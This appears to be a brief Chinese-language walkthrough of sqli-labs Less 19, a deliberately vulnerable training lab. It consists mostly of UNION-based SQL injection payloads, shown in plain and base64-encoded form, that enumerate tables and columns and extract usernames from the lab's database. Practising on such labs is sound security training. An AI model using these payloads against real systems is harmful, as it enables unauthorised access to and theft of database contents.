#sqli-labs less 19
這一關大概與less18差不多,隻不過playload得用base64加密
') order by 4
') union select 1,2,3 #
')union select 1,database(),version()#
')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 #
Jyl1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDMgIw==
')union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),3 #
Jyl1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDMgIw==
‘)union select 1,(select group_concat(’#’,username,’#’) from security.users),3 #
Jyl1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCgnIycsdXNlcm5hbWUsJyMnKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSwzICM=
![sqli-labs (less20-less22)less 20less 21less 22[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)